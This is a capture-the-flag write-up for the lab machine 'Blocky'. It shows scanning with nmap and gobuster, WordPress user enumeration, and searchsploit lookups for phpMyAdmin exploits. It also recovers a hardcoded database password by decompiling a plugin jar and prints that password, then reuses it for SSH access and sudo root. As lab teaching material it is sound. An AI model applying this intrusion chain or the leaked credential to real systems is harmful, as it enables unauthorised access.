I start by modifying my /etc/hosts file to avoid writing the IP everytime :
10.10.10.37 blockyThen I look for open ports with nmap and start an OpenVAS scan:
nmap -p- blocky -Pn
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
8192/tcp closed sophos
25565/tcp open minecraftNow I can start nmap scripts on the open ports to gather more information:
nmap -p21,22,80,8192,25565 -A -Pn blocky
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelUbuntu
| Port | Service |
|---|---|
| 21/tcp | ftp |
| 22/tcp | ssh |
| 80/tcp | http |
| 25565/tcp | minecraft |
Here is the main vulnerability found by OpenVAS:
| Service | Description | Severity |
|---|---|---|
| WordPress | WordPress User IDs and User Names Disclosure | Medium |
WordPress platforms use a parameter called author. This parameter accepts integer values and represents the User ID of users in the web site. For example: http://www.example.com/?author=1. The problems found are: 1. User ID values are generated consecutively. 2. When a valid User ID is found, WordPress redirects to a web page with the name of the author.
This exploit is trivial and author=1 leads to /author/notch.
To gather more info I start a directory enumeration with gobuster:
gobuster dir -u http://10.10.10.37 -w Resources/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
/wiki (Status: 301)
/wp-content (Status: 301)
/plugins (Status: 301)
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)I use metasploit to retrieve the Wordpress version:
msf6 auxiliary(scanner/http/wordpress_scanner) > exploit
[*] Trying 10.10.10.37
[+] 10.10.10.37 running Wordpress 4.8It appears the version is 4.8.
In the phpmyadmin interface I click on the ? button which leads me to the documentation for this version of the software.
There I learn that the version is 4.5.4.1.
I use searchsploit to list vulnerabilities in phpmyadmin and two of them stand out:
searchsploit phpmyadmin
| Exploit title | Path |
| ------------------------------------------------------------ | --------------------- |
| phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution | php/webapps/40185.py |
| WordPress Plugin Portable phpMyAdmin - Authentication Bypass | php/webapps/23356.txt |Since the blog is using wordpress, it my be that phpymyadmin is actually a wordpress plugin.
I use the -p option to retrieve the path to the vulnerability documentation:
searchsploit -p 23356It turns out that the vulnerability might be too old to be used, but very interesting nonetheless:
Navigate to http://host/wp-content/plugins/portable-phpmyadmin/wp-pma-mod and you will be presented with the full portable-phpMyAdmin web interface without the requirement of a session or any credential.
Unfortunately I didn't manage to exploit it (even by using variations of the vulnerable URL) and the other
http://10.10.10.37/wp-includes/ contains a directory listing of php files mostly. Unfortunately I didn't find anything interesting there.
The wiki is under construction.
This page redirects to /wp-login.php. I tried some obvious combination of user and password but nothing worked.
The plugins directory contains two files:
After decompiling BlockyCore.jar with bytecode-viewer, I access the following class that contains a username and password hardcoded:
package com.myfirstplugin;
public class BlockyCore {
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
}Everything indicates that I should try it in the PhpMyAdmin interface, and it does work!
My system is not working that well with python2 so I use pipenv to create a virtual environment where I can run the exploit.
pipenv --python 2.7
pipenv shellI then install requests which is a required dependency:
pipenv install requestsI retrieve the exploit for the CVE-2016-5734 with searchsploit -m 40185 which copies the exploit in the current directory.
Unfortunately the exploit doesn't work, this is because the PHP version is 7.0.18:
Details: Working only at PHP 4.3.0-5.4.6 versions [...]
At this stage I decide to see if the password I found is reusable. And the combination of the user notch with the password found gives me access to the machine.
This also gives me access to the user flag. The user notch is great: he has sudo rights!
This gives me access to the root flag.